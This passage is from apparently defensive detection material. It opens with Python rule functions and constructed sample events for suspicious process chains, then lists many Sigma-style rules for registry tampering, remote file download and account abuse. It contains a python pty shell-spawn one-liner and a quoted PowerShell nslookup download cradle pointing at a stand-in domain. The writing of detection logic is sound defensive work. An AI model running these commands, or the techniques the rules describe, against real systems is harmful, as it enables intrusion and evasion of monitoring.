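        if not arg.startswith("-") or arg.startswith("--"):
            break
        if flags & set(arg[1:]):  # also catches combined flags such as 'perl -le'
            return True
    return False

def rsync_shell_without_e(ev: ProcEvent) -> bool:
    """Shell spawned by rsync although rsync was not told to use a remote shell
    via -e/--rsh (Suspicious Invocation of Shell via Rsync)."""
    if basename(ev.parent_image) != "rsync" or basename(ev.image) not in SHELLS:
        return False
    for arg in argv(ev.parent_command_line)[1:]:
        if arg.startswith("--rsh"):
            return False
        if arg.startswith("-") and not arg.startswith("--") and "e" in arg[1:]:
            return False  # '-e ssh' or combined '-avze ssh' is the expected path
    return True

def moveit_csc_via_w3wp(ev: ProcEvent) -> bool:
    """IIS worker process compiling code on the fly (MOVEit CVE-2023-34362 rule)."""
    return basename(ev.parent_image) == "w3wp.exe" and basename(ev.image) == "csc.exe"

def suspicious_app_web_dll(path: str) -> bool:
    """True if a written file path matches the App_Web_*.dll pattern from the rule."""
    return APP_WEB_DLL.search(path) is not None

RULES = {
    "inline_interpreter_exec": inline_interpreter_exec,
    "rsync_shell_without_e": rsync_shell_without_e,
    "moveit_csc_via_w3wp": moveit_csc_via_w3wp,
}

def run_rules(events) -> dict:
    """Map each rule name to the indices of the events it fires on."""
    hits = {name: [] for name in RULES}
    for i, ev in enumerate(events):
        for name, rule in RULES.items():
            if rule(ev):
                hits[name].append(i)
    return hits

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    ProcEvent("/usr/bin/python3.11", "/bin/bash",
              "python3 -c 'import pty; pty.spawn(\"/bin/sh\")'", "bash"),           # 0: inline code
    ProcEvent("/usr/bin/python3.11", "/bin/bash",
              "python3 manage.py runserver -c settings.ini", "bash"),                # 1: '-c' belongs to the script
    ProcEvent("/usr/bin/perl", "/bin/bash", "perl -le 'print 1'", "bash"),           # 2: combined flags
    ProcEvent("/bin/sh", "/usr/bin/rsync", "sh -c id", "rsync -av src/ dst/"),       # 3: shell without -e
    ProcEvent("/bin/sh", "/usr/bin/rsync", "sh -c 'ssh host rsync --server'",
              "rsync -avze ssh src/ host:dst/"),                                     # 4: legitimate remote shell
    ProcEvent(r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r"C:\Windows\System32\inetsrv\w3wp.exe",
              "csc.exe /noconfig /fullpaths @args.cmdline", "w3wp.exe -ap MOVEit"),  # 5: w3wp -> csc
]

if __name__ == "__main__":
    for name, idx in run_rules(SAMPLE_EVENTS).items():
        print(f"{name}: events {idx}")
```

Stopping the flag scan at the first non-option argument is what keeps event 1 quiet; a plain substring match on "-c" would fire on it. The rsync check is the inverse of the usual pattern: the shell is expected when "-e" or "--rsh" is present, so the absence of the flag is what makes the child suspicious.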
attack.t1112 87
Show Rules (87)
  • Abusing Windows Telemetry For Persistence - Registry - Level: high
    Description: Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. The problem is, it will run any arbitrary command without restriction of location or type.
  • Service Binary in Uncommon Folder - Level: medium
    Description: Detects the creation of a service with a service binary located in an uncommon directory
  • Office Security Settings Changed - Level: high
    Description: Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references)
  • Remote Registry Lateral Movement - Level: high
    Description: Detects remote RPC calls to modify the registry and possibly execute code
  • ETW Logging Disabled In .NET Processes - Registry - Level: high
    Description: Potential adversaries stopping ETW providers recording loaded .NET assemblies.
  • NetNTLM Downgrade Attack - Level: high
    Description: Detects NetNTLM downgrade attack
  • Sysmon Channel Reference Deletion - Level: high
    Description: Potential threat actor tampering with Sysmon manifest and eventually disabling it
  • New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE - Level: high
    Description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)
  • Imports Registry Key From a File - Level: medium
    Description: Detects the import of the specified file to the registry with regedit.exe.
  • Imports Registry Key From an ADS - Level: high
    Description: Detects the import of an alternate data stream to the registry with regedit.exe.
  • Suspicious Registry Modification From ADS Via Regini.EXE - Level: high
    Description: Detects the import of an alternate data stream with regini.exe; regini.exe can be used to modify registry keys.
  • Registry Modification Via Regini.EXE - Level: low
    Description: Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files.
  • Potentially Suspicious Desktop Background Change Using Reg.EXE - Level: medium
    Description: Detects the execution of "reg.exe" to alter registry keys that would replace the user's desktop background. This is a common technique used by malware to change the desktop background to a ransom note or other image.
  • Potential Suspicious Registry File Imported Via Reg.EXE - Level: medium
    Description: Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility
  • Enable LM Hash Storage - ProcCreation - Level: high
    Description: Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM hashes. By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN Manager hash of your password in Active Directory and local SAM databases.
  • RestrictedAdminMode Registry Value Tampering - ProcCreation - Level: high
    Description: Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop. This prevents your credentials from being harvested during the initial connection process if the remote server has been compromised.
  • Potential Tampering With RDP Related Registry Keys Via Reg.EXE - Level: high
    Description: Detects the execution of "reg.exe" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\Control\Terminal Server' values
  • Reg Add Suspicious Paths - Level: high
    Description: Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys
  • ShimCache Flush - Level: high
    Description: Detects actions that clear the local ShimCache and remove forensic evidence
  • Run Once Task Execution as Configured in Registry - Level: low
    Description: This rule detects the execution of Run Once task as configured in the registry
  • Non-privileged Usage of Reg or Powershell - Level: high
    Description: Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry
  • Suspicious VBoxDrvInst.exe Parameters - Level: medium
    Description: Detects VBoxDrvInst.exe run with parameters that allow processing an INF file. This allows creating values in the registry and installing drivers. For example, one could use this technique to obtain persistence by modifying one of the Run or RunOnce registry keys
  • Potential NetWire RAT Activity - Registry - Level: high
    Description: Detects registry keys related to NetWire RAT
  • Terminal Server Client Connection History Cleared - Registry - Level: high
    Description: Detects the deletion of registry keys containing the MSTSC connection history
  • Removal of Potential COM Hijacking Registry Keys - Level: medium
    Description: Detects any deletion of entries in ".*\shell\open\command" registry keys. These registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks.
  • Disable Security Events Logging Adding Reg Key MiniNt - Level: high
    Description: Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, the Windows Event Log service will stop writing events.
  • Wdigest CredGuard Registry Modification - Level: high
    Description: Detects potential malicious modification of the property value of IsCredGuardEnabled from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to disable Cred Guard on a system. This is usually used with UseLogonCredential to manipulate the caching credentials.
  • Registry Entries For Azorult Malware - Level: critical
    Description: Detects the presence of a registry key created during Azorult execution
  • Potential Qakbot Registry Activity - Level: high
    Description: Detects a registry key used by IcedID in a campaign that distributes malicious OneNote files
  • NetNTLM Downgrade Attack - Registry - Level: high
    Description: Detects NetNTLM downgrade attack
  • RedMimicry Winnti Playbook Registry Manipulation - Level: high
    Description: Detects actions caused by the RedMimicry Winnti playbook
  • Run Once Task Configuration in Registry - Level: medium
    Description: Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup
  • Allow RDP Remote Assistance Feature - Level: medium
    Description: Detects enabling the RDP Remote Assistance feature to allow a specific user to connect to the targeted machine via RDP
  • New BgInfo.EXE Custom DB Path Registry Configuration - Level: medium
    Description: Detects setting of a new registry database value related to BgInfo configuration. Attackers can for example set this value to save the results of the commands executed by BgInfo in order to exfiltrate information.
  • New BgInfo.EXE Custom WMI Query Registry Configuration - Level: medium
    Description: Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom WMI query via "BgInfo.exe"
  • New BgInfo.EXE Custom VBScript Registry Configuration - Level: medium
    Description: Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom VBScript via "BgInfo.exe"
  • Blackbyte Ransomware Registry - Level: high
    Description: BlackByte sets three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption
  • ClickOnce Trust Prompt Tampering - Level: medium
    Description: Detects changes to the ClickOnce trust prompt registry key in order to enable an installation from different locations such as the Internet.
  • CrashControl CrashDump Disabled - Level: medium
    Description: Detects disabling the CrashDump per registry (as used by HermeticWiper)
  • Service Binary in Suspicious Folder - Level: high
    Description: Detect the creation of a service with a service binary located in a suspicious directory
  • Potentially Suspicious Desktop Background Change Via Registry - Level: medium
    Description: Detects registry value settings that would replace the user's desktop background. This is a common technique used by malware to change the desktop background to a ransom note or other image.
  • DHCP Callout DLL Installation - Level: high
    Description: Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)
  • Disable Internal Tools or Feature in Registry - Level: medium
    Description: Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)
  • Disable Windows Security Center Notifications - Level: medium
    Description: Detects setting UseActionCenterExperience to 0 to disable the Windows Security Center notifications
  • Add DisallowRun Execution to Registry - Level: medium
    Description: Detects setting DisallowRun to 1 to prevent users from running specific programs
  • DNS-over-HTTPS Enabled by Registry - Level: medium
    Description: Detects when a user enables DNS-over-HTTPS. This can be used to hide internet activity or to hide the process of exfiltrating data. With this enabled, organizations lose visibility into data such as query type, response and originating IP that are used to identify bad actors.
  • New DNS ServerLevelPluginDll Installed - Level: high
    Description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)
  • ETW Logging Disabled In .NET Processes - Sysmon Registry - Level: high
    Description: Potential adversaries stopping ETW providers recording loaded .NET assemblies.
  • Change User Account Associated with the FAX Service - Level: high
    Description: Detects a change of the user account the Fax service runs as, which an attacker can use to have a planted Fax DLL run with higher privileges.
  • Change the Fax Dll - Level: high
    Description: Detects possible persistence via a modified Fax DLL that is loaded when the service restarts
  • Registry Hide Function from User - Level: medium
    Description: Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla and HermeticWiper use this technique)
  • RestrictedAdminMode Registry Value Tampering - Level: high
    Description: Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop. This prevents your credentials from being harvested during the initial connection process if the remote server has been compromised.
  • Blue Mockingbird - Registry - Level: high
    Description: Attempts to detect system changes made by Blue Mockingbird
  • NET NGenAssemblyUsageLog Registry Key Tamper - Level: high
    Description: Detects changes to the NGenAssemblyUsageLog registry key. The .NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the registry or by configuring an environment variable. By simply specifying an arbitrary value (e.g. a fake output location or junk data) in place of the expected value, no Usage Log file will be created for the .NET execution context.
  • Trust Access Disable For VBApplications - Level: high
    Description: Detects registry changes to Microsoft Office "AccessVBOM" to a value of "1", which grants programmatic access to the VBA project object model on the victim machine and lets attackers create or modify malicious macros without any Microsoft Office warnings.
  • Outlook EnableUnsafeClientMailRules Setting Enabled - Registry - Level: high
    Description: Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros
  • Uncommon Microsoft Office Trusted Location Added - Level: high
    Description: Detects changes to registry keys related to "Trusted Location" of Microsoft Office where the path is set to something uncommon. Attackers might add additional trusted locations to avoid macro security restrictions.
  • Macro Enabled In A Potentially Suspicious Document - Level: high
    Description: Detects registry changes to Office trust records where the path is located in a potentially suspicious location
  • Office Macros Warning Disabled - Level: high
    Description: Detects registry changes to Microsoft Office "VBAWarning" to a value of "1" which enables the execution of all macros, whether signed or unsigned.
  • Potential Persistence Via Custom Protocol Handler - Level: medium
    Description: Detects potential persistence activity via the registration of a new custom protocol handler. While legitimate applications often register protocol handlers during installation, an attacker can abuse this by setting a custom handler to be used as a persistence mechanism.
  • Potential Persistence Via Event Viewer Events.asp - Level: medium
    Description: Detects potential registry persistence technique using the Event Viewer "Events.asp" technique
  • Modification of IE Registry Settings - Level: low
    Description: Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. An attacker can abuse this registry key to add a domain to the trusted sites Zone or insert javascript for persistence
  • Potential Persistence Via Outlook Today Page - Level: high
    Description: Detects potential persistence activity via outlook today page. An attacker can set a custom page to execute arbitrary code and link to it via the registry values "URL" and "UserDefinedUrl".
  • Potential Persistence Via Outlook Home Page - Level: high
    Description: Detects potential persistence activity via outlook home page. An attacker can set a home page to achieve code execution and persistence by editing the WebView registry keys.
  • ETW Logging Disabled For rpcrt4.dll - Level: low
    Description: Detects changes to the "ExtErrorInformation" key in order to disable ETW logging for rpcrt4.dll
  • ETW Logging Disabled For SCM - Level: low
    Description: Detects changes to the "TracingDisabled" key in order to disable ETW logging for services.exe (SCM)
  • Registry Explorer Policy Modification - Level: medium
    Description: Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)
  • Activate Suppression of Windows Security Center Notifications - Level: medium
    Description: Detect set Notification_Suppress to 1 to disable the Windows security center notification
  • Enable LM Hash Storage - Level: high
    Description: Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM hashes. By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN Manager hash of your password in Active Directory and local SAM databases.
  • RDP Sensitive Settings Changed to Zero - Level: medium
    Description: Detects tampering with sensitive RDP Terminal Service/Server settings, such as allowing unauthorized users access to a system via 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'.
  • RDP Sensitive Settings Changed - Level: high
    Description: Detects tampering of sensitive RDP Terminal Service/Server settings, such as allowing unauthorized users access to a system via 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'.
  • Wdigest Enable UseLogonCredential - Level: high
    Description: Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to enable clear-text credentials
  • Winlogon AllowMultipleTSSessions Enable - Level: medium
    Description: Detects when the 'AllowMultipleTSSessions' value is enabled, which allows multiple Remote Desktop connection sessions to be open at once. This is often used by attackers as a way to connect to an RDP session without disconnecting other users.
  • OceanLotus Registry Activity - Level: critical
    Description: Detects registry keys created in OceanLotus (also known as APT32) attacks
  • OilRig APT Activity - Level: critical
    Description: Detects OilRig activity as reported by Nyotron in their March 2018 report
  • OilRig APT Registry Persistence - Level: critical
    Description: Detects OilRig registry persistence as reported by Nyotron in their March 2018 report
  • OilRig APT Schedule Task Persistence - Security - Level: critical
    Description: Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report
  • OilRig APT Schedule Task Persistence - System - Level: critical
    Description: Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report
  • Potential Ursnif Malware Activity - Registry - Level: high
    Description: Detects registry keys related to Ursnif malware.
  • CVE-2020-1048 Exploitation Attempt - Suspicious New Printer Ports - Registry - Level: high
    Description: Detects changes to the "Ports" registry key with data that includes a Windows path or a file with a suspicious extension. This could be an attempt to exploit CVE-2020-1048 - a Windows Print Spooler elevation of privilege vulnerability.
  • Blue Mockingbird - Level: high
    Description: Attempts to detect system changes made by Blue Mockingbird
  • FlowCloud Registry Markers - Level: critical
    Description: Detects FlowCloud malware registry markers from threat group TA410. The malware stores its configuration in the registry alongside drivers utilized by the malware's keylogger components.
  • Potential Raspberry Robin Registry Set Internet Settings ZoneMap - Level: low
    Description: Detects registry modifications related to the proxy configuration of the system, potentially associated with the Raspberry Robin malware, as seen in campaigns running in Q1 2024. Raspberry Robin may alter proxy settings to circumvent security measures, ensuring unhindered connection with Command and Control servers for maintaining control over compromised systems if there are any proxy settings that are blocking connections.
  • Remote Registry Management Using Reg Utility - Level: medium
    Description: Detects remote registry management using the REG utility from a non-admin workstation
  • Access To .Reg/.Hive Files By Uncommon Applications - Level: low
    Description: Detects file access requests to files ending with either the ".hive"/".reg" extension, usually associated with Windows Registry backups.
  • Microsoft Office Trusted Location Updated - Level: medium
    Description: Detects changes to the registry keys related to "Trusted Location" of Microsoft Office. Attackers might add additional trusted locations to avoid macro security restrictions.
  • Service Binary in User Controlled Folder - Level: medium
    Description: Detects the setting of the "ImagePath" value of a service registry key to a path controlled by a non-administrator user, such as "\AppData\" or "\ProgramData\". Attackers often use such directories for staging purposes. This rule might also trigger on badly written software; if an attacker controls an auto-starting service, they might achieve persistence or privilege escalation. Note that while ProgramData is a user-controlled folder, software might apply strict ACLs that make its subfolders accessible only to admin users. Remove such folders via filters if you experience a lot of noise.
attack.t1105 70
  • Microsoft Binary Github Communication - Level: high
    Description: Detects an executable in the Windows folder accessing github.com
  • Suspicious Certutil Command Usage - Level: high
    Description: Detects a suspicious Microsoft certutil execution with sub commands such as 'decode', which is sometimes used to decode malicious code
  • Abusing Findstr for Defense Evasion - Level: medium
    Description: Attackers can use findstr to hide their artifacts or search for specific strings and evade defense mechanisms
  • Suspicious File Download Using Office Application - Level: high
    Description: Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files
  • Nslookup PwSh Download Cradle - Level: medium
    Description: This rule tries to detect powershell download cradles, e.g. powershell . (nslookup -q=txt http://some.owned.domain.com)[-1]
  • Windows Update Client LOLBIN - Level: high
    Description: Detects code execution via the Windows Update client (wuauclt)
  • Remote File Copy - Level: low
    Description: Detects the use of tools that copy files from or to remote systems
  • Wget Creating Files in Tmp Directory - Level: medium
    Description: Detects the use of wget to download content in a temporary directory such as "/tmp" or "/var/tmp"
  • Curl Usage on Linux - Level: low
    Description: Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server
  • Suspicious Curl File Upload - Linux - Level: medium
    Description: Detects a suspicious curl process start that adds a file to a web request
  • Download File To Potentially Suspicious Directory Via Wget - Level: medium
    Description: Detects the use of wget to download content to a suspicious directory
  • Hidden Flag Set On File/Directory Via Chflags - MacOS - Level: medium
    Description: Detects the execution of the "chflags" utility with the "hidden" flag, in order to hide files on MacOS. When a file or directory has this hidden flag set, it becomes invisible to the default file listing commands and in graphical file browsers.
  • File Download Via Nscurl - MacOS - Level: medium
    Description: Detects the execution of the nscurl utility in order to download files.
  • Potential In-Memory Download And Compile Of Payloads - Level: medium
    Description: Detects potential in-memory downloading and compiling of applets using curl and osacompile as seen used by XCSSET malware
  • Cisco Stage Data - Level: low
    Description: Various protocols may be used to put data on the device for exfiltration or infiltration
  • Executable from Webdav - Level: medium
    Description: Detects executable access via webdav6. This can be seen in APT29 activity, such as in the emulated APT29 hackathon https://github.com/OTRF/detection-hackathon-apt29/
  • Download from Suspicious Dyndns Hosts - Level: medium
    Description: Detects download of certain file types from hosts with dynamic DNS names (selected list)
  • Password Protected ZIP File Opened (Suspicious Filenames) - Level: high
    Description: Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.
  • AppX Package Installation Attempts Via AppInstaller.EXE - Level: medium
    Description: Detects DNS queries made by "AppInstaller.EXE". The AppInstaller is the default handler for the "ms-appinstaller" URI. It attempts to load/install a package from the referenced URL
  • Suspicious Desktopimgdownldr Target File - Level: high
    Description: Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension
  • Uncommon Network Connection Initiated By Certutil.EXE - Level: high
    Description: Detects a network connection initiated by the certutil.exe utility. Attackers can abuse the utility in order to download malware or additional payloads.
  • Suspicious Dropbox API Usage - Level: high
    Description: Detects an executable that isn't dropbox but communicates with the Dropbox API
  • Network Connection Initiated By IMEWDBLD.EXE - Level: high
    Description: Detects a network connection initiated by IMEWDBLD.EXE. This might indicate potential abuse of the utility as a LOLBIN in order to download arbitrary files or additional payloads.
  • Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon Location - Level: high
    Description: Detects a network connection initiated by programs or processes running from suspicious or uncommon files system locations.
  • Network Communication Initiated To File Sharing Domains From Process Located In Suspicious Folder - Level: high
    Description: Detects executables located in potentially suspicious directories initiating network connections towards file sharing domains.
  • Outbound Network Connection Initiated By Script Interpreter - Level: high
    Description: Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.
  • Local Network Connection Initiated By Script Interpreter - Level: medium
    Description: Detects a script interpreter (Wscript/Cscript) initiating a local network connection to download or execute a script hosted on a shared folder.
  • Potential COM Objects Download Cradles Usage - PS Script - Level: medium
    Description: Detects usage of COM objects that can be abused to download files in PowerShell by CLSID
  • Browser Execution In Headless Mode - Level: medium
    Description: Detects execution of Chromium based browser in headless mode
  • File Download with Headless Browser - Level: high
    Description: Detects execution of chromium based browser in headless mode using the "dump-dom" command line to download files
  • File Download From Browser Process Via Inline URL - Level: medium
    Description: Detects execution of a browser process with a URL argument pointing to a file with a potentially interesting extension. This can be abused to download arbitrary files or to hide from the user for example by launching the browser in a minimized state.
  • File Download via CertOC.EXE - Level: medium
    Description: Detects when a user downloads a file by using CertOC.exe
  • File Download From IP Based URL Via CertOC.EXE - Level: high
    Description: Detects when a user downloads a file from an IP based URL using CertOC.exe
  • Curl Download And Execute Combination - Level: high
    Description: Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.
  • Command Line Execution with Suspicious URL and AppData Strings - Level: medium
    Description: Detects a suspicious command line execution that includes a URL and an AppData string in the command line parameters, as used by several droppers (js/vbs > powershell)
  • Potential Download/Upload Activity Using Type Command - Level: medium
    Description: Detects usage of the "type" command to download/upload data from WebDAV server
  • Suspicious Curl.EXE Download - Level: high
    Description: Detects a suspicious curl process start on Windows that outputs the requested document to a local file
  • Remote File Download Via Desktopimgdownldr Utility - Level: medium
    Description: Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.
  • Suspicious Desktopimgdownldr Command - Level: high
    Description: Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet
  • Remote File Download Via Findstr.EXE - Level: medium
    Description: Detects execution of "findstr" with specific flags and a remote share path. This specific set of CLI flags would allow "findstr" to download the content of the file located on the remote share as described in the LOLBAS entry.
  • Insensitive Subfolder Search Via Findstr.EXE - Level: low
    Description: Detects execution of findstr with the "s" and "i" flags for a "subfolder" and "insensitive" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands.
  • Finger.EXE Execution - Level: high
    Description: Detects execution of the "finger.exe" utility. Finger.EXE or "TCPIP Finger Command" is an old utility that is still present on modern Windows installations. It displays information about users on a specified remote computer (typically a UNIX computer) that is running the finger service or daemon. Due to the old nature of this utility and the rareness of machines running the finger service, any execution of "finger.exe" can be considered "suspicious" and worth investigating.
  • Arbitrary File Download Via GfxDownloadWrapper.EXE - Level: medium
    Description: Detects execution of GfxDownloadWrapper.exe with a URL as an argument to download file.
  • File Download Using Notepad++ GUP Utility - Level: high
    Description: Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.
  • File Download And Execution Via IEExec.EXE - Level: high
    Description: Detects execution of the IEExec utility to download and execute files
  • Import LDAP Data Interchange Format File Via Ldifde.EXE - Level: medium
    Description: Detects the execution of "Ldifde.exe" with the import flag "-i". This can be abused to include HTTP-based arguments, which allows the arbitrary download of files from a remote server.
  • Suspicious Diantz Download and Compress Into a CAB File - Level: medium
    Description: Detects the download and compression of a remote file into a CAB file stored on the local machine.
  • Suspicious Extrac32 Execution - Level: medium
    Description: Detects file download or copy via Extrac32
  • PrintBrm ZIP Creation of Extraction - Level: high
    Description: Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.
  • Replace.exe Usage - Level: medium
    Description: Detects the use of Replace.exe, which can be used to replace a file with another file
  • Suspicious Certreq Command to Download - Level: high
    Description: Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files
  • File Download Via Windows Defender MpCmpRun.EXE - Level: high
    Description: Detects the use of Windows Defender MpCmdRun.EXE to download files
  • MsiExec Web Install - Level: medium
    Description: Detects suspicious msiexec process starts with web addresses as parameter
  • Potential COM Objects Download Cradles Usage - Process Creation - Level: medium
    Description: Detects usage of COM objects that can be abused to download files in PowerShell by CLSID
  • PowerShell Web Download - Level: medium
    Description: Detects suspicious ways to download files or content using PowerShell
  • Potential DLL File Download Via PowerShell Invoke-WebRequest - Level: medium
    Description: Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet
  • Suspicious Invoke-WebRequest Execution With DirectIP - Level: medium
    Description: Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access
  • Suspicious Invoke-WebRequest Execution - Level: high
    Description: Detects a suspicious call to the Invoke-WebRequest cmdlet where the output is located in a suspicious location
  • PowerShell DownloadFile - Level: high
    Description: Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line
  • PUA - Nimgrab Execution - Level: high
    Description: Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.
  • Suspicious Download from Office Domain - Level: high
    Description: Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents
  • Pandemic Registry Key - Level: critical
    Description: Detects Pandemic Windows Implant
  • Lolbas OneDriveStandaloneUpdater.exe Proxy Download - Level: high
    Description: Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any anomalous executables with suspicious arguments. The downloaded file will be in C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdaterreSignInSettingsConfig.json
  • Greenbug Espionage Group Indicators - Level: critical
    Description: Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec
  • DarkGate - Autoit3.EXE File Creation By Uncommon Process - Level: medium
    Description: Detects the usage of curl.exe, KeyScramblerLogon, or other non-standard/suspicious processes used to create Autoit3.exe. This activity has been associated with DarkGate malware, which uses Autoit3.exe to execute shellcode that performs process injection and connects to the DarkGate command-and-control server. Curl, KeyScramblerLogon, and these other processes constitute non-standard and suspicious ways to retrieve the Autoit3 executable.
  • Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE - Level: medium
    Description: Detects the execution of concatenated commands via "cmd.exe". Pikabot often executes a combination of multiple commands via the command handler "cmd /c" in order to download and execute additional payloads: commands such as "curl" and "wget" are used to download extra payloads, "ping" and "timeout" are abused to introduce delays in the command execution, and "Rundll32" is used to execute malicious DLL files. In the observed Pikabot infections, a combination of the commands described above is used to orchestrate the download and execution of malicious DLL files.
  • Network Connection Initiated From Users\Public Folder - Level: medium
    Description: Detects a network connection initiated from a process located in the "C:\Users\Public" folder. Attackers are known to drop their malicious payloads and malware in this directory as it is writable by everyone. Use this rule to hunt for potentially suspicious or uncommon activity in your environment.
  • File Download Via Curl.EXE - Level: medium
    Description: Detects file download using curl.exe
  • Curl.EXE Execution - Level: low
    Description: Detects a curl process start on Windows, which could indicate a file download from a remote location or a simple web request to a remote server
  • Potential Data Exfiltration Via Curl.EXE - Level: medium
    Description: Detects the execution of the "curl" process with "upload" flags, which might indicate potential data exfiltration
attack.t1078 63
  • Kubernetes Admission Controller Modification - Level: medium
    Description: Detects when a modification (create, update or replace) action is taken that affects mutating or validating webhook configurations, as they can be used by an adversary to achieve persistence or exfiltrate access credentials.
  • OpenCanary - SSH Login Attempt - Level: high
    Description: Detects instances where an SSH service on an OpenCanary node has had a login attempt.
  • OpenCanary - SSH New Connection Attempt - Level: high
    Description: Detects instances where an SSH service on an OpenCanary node has had a connection attempt.
  • OpenCanary - Telnet Login Attempt - Level: high
    Description: Detects instances where a Telnet service on an OpenCanary node has had a login attempt.
  • Malicious Usage Of IMDS Credentials Outside Of AWS Infrastructure - Level: high
    Description: Detects when an instance identity has taken an action that isn't inside SSM. This can indicate that a compromised EC2 instance is being used as a pivot point.
  • AWS Key Pair Import Activity - Level: medium
    Description: Detects the import of SSH key pairs into AWS EC2, which may indicate an attacker attempting to gain unauthorized access to instances. This activity could lead to initial access, persistence, or privilege escalation, potentially compromising sensitive data and operations.
  • AWS Suspicious SAML Activity - Level: medium
    Description: Identifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML.
  • User Added to an Administrator's Azure AD Role - Level: medium
    Description: Detects when a user is added to an administrator's Azure AD role
  • Azure Kubernetes Admission Controller - Level: medium
    Description: Identifies when an admission controller is executed in Azure Kubernetes. A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster. For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials. An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.
  • Account Created And Deleted Within A Close Time Frame - Level: high
    Description: Detects when an account was created and deleted in a short period of time.
  • Guest Users Invited To Tenant By Non Approved Inviters - Level: medium
    Description: Detects guest users being invited to tenant by non-approved inviters
  • Azure Domain Federation Settings Modified - Level: medium
    Description: Identifies when a user or application modified the federation settings on the domain.
  • PIM Alert Setting Changes To Disabled - Level: high
    Description: Detects when PIM alerts are set to disabled.
  • Azure Subscription Permission Elevation Via AuditLogs - Level: high
    Description: Detects when a user has been elevated to manage all Azure Subscriptions. This change should be investigated immediately if it isn't planned. This setting could allow an attacker access to Azure subscriptions in your environment.
  • Activity From Anonymous IP Address - Level: high
    Description: Identifies that users were active from an IP address that has been identified as an anonymous proxy IP address.
  • Atypical Travel - Level: high
    Description: Identifies two sign-ins originating from geographically distant locations, where at least one of the locations may also be atypical for the user, given past behavior.
  • Impossible Travel - Level: high
    Description: Identifies user activities originating from geographically distant locations within a time period shorter than the time it takes to travel from the first location to the second.
